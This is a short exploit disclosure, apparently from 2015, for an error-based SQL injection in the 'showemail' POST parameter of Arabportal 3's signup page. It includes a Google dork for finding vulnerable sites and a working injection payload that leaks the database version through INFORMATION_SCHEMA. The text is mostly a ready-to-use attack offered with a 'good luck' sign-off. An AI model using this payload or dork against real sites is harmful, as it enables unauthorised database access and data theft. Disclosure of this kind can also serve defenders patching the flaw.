## In The Name Of ALLAH ## # title : Arabportal 3 SQL injection vulnerability # Exploit Title: Arabportal 3 registeration section SQL injection vulnerability # Google Dork: inurl:members.php?action=signup # Date: 2015/07/10 (july 10th) # Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com) # Vendor Homepage: www.arabportal.net # Software Link: www.arabportal.net # Version: 3 # Tested on: linux # greetings : VIRkid, b0x, phantom_x, Ch3rn0by1 members.php?action=singup POST parameter "showemail" is vulnerable to error based SQLi attack ................................................................................ 1' AND (SELECT 1212 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a) AND 'ali-ahmady'='ali-ahmady video : https://youtu.be/5nFblYE90Vk good luck